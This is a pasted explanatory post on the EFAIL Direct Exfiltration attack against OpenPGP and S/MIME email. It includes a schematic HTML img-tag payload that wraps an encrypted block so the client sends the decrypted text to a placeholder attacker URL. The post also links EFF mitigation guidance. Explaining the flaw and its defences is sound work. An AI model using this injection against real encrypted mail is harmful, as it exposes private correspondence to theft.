Advertisement
Guest User

Untitled

a guest
Feb 15th, 2019
109
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.94 KB | None | 0 0
  1. @Hans W mentioned EFAIL vulnerabilities in the end-to-end encryption technologies OpenPGP and S/MIME that captures the plain-text of encrypted emails.
  2.  
  3. There are two types of EFAIL exploits, Direct Exfiltration and CBC/CFB Gadget Attack. This article only addresses the Direct Exfiltration exploit.
  4.  
  5. The Direct Exfiltration attack exploits the way email clients handle HTML externally requested objects such as graphics and styles immediately following decryption.
  6.  
  7. The attacker injects an HTML statement requesting the external object. With the start tag and end tag straddling the encrypted body of the email.
  8.  
  9. Example using a graphic request:
  10.  
  11. <img scr=”http***cheaptrick.gif”
  12. -----BEGIN PGP MESSAGE-----
  13. Version: PGP Personal Security 7.0.3
  14. Encrypted Block of Text
  15. -----END PGP MESSAGE-----
  16. “>
  17.  
  18. Immediately following decryption, the email client requests the external graphic and all the decrypted information between the tags is sent to and captured by the attacker.
  19.  
  20. The simplicity of the exploit allows the attacker to inject the code to any detected encrypted email.
  21.  
  22. On 29 May 2018, the EFF published How To Turn PGP Back On As Safely As Possible. Using versions of Thunderbird 52.8 using the Enigmail 2.0.6 plugin or above provides a measure of security. Read the entire article for settings and recommended methods to protect your privacy.
  23.  
  24. Some of the more obvious mitigating measures should be closely evaluated. All email clients should be evaluated for their ability to mitigate this exploit.
  25.  
  26. I plan to post other articles covering the CBC/CFB Gadget Attack and mitigation methos.
  27.  
  28. These are the primary sources for this article. Be sure to review the links for more information and mitigating measures.
  29.  
  30. EFAIL.DE
  31. PGP and EFAIL: Frequently Asked Questions
  32.  
  33. I welcome any corrections, comments, and thoughts.
  34.  
  35. EFAIL #Encryption #Decryption #Attack #Exploit #Vulnerability #PGP #S/MIME #OpenPGP #GPG #Email #EFF #Thunderbird #Enigmail
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement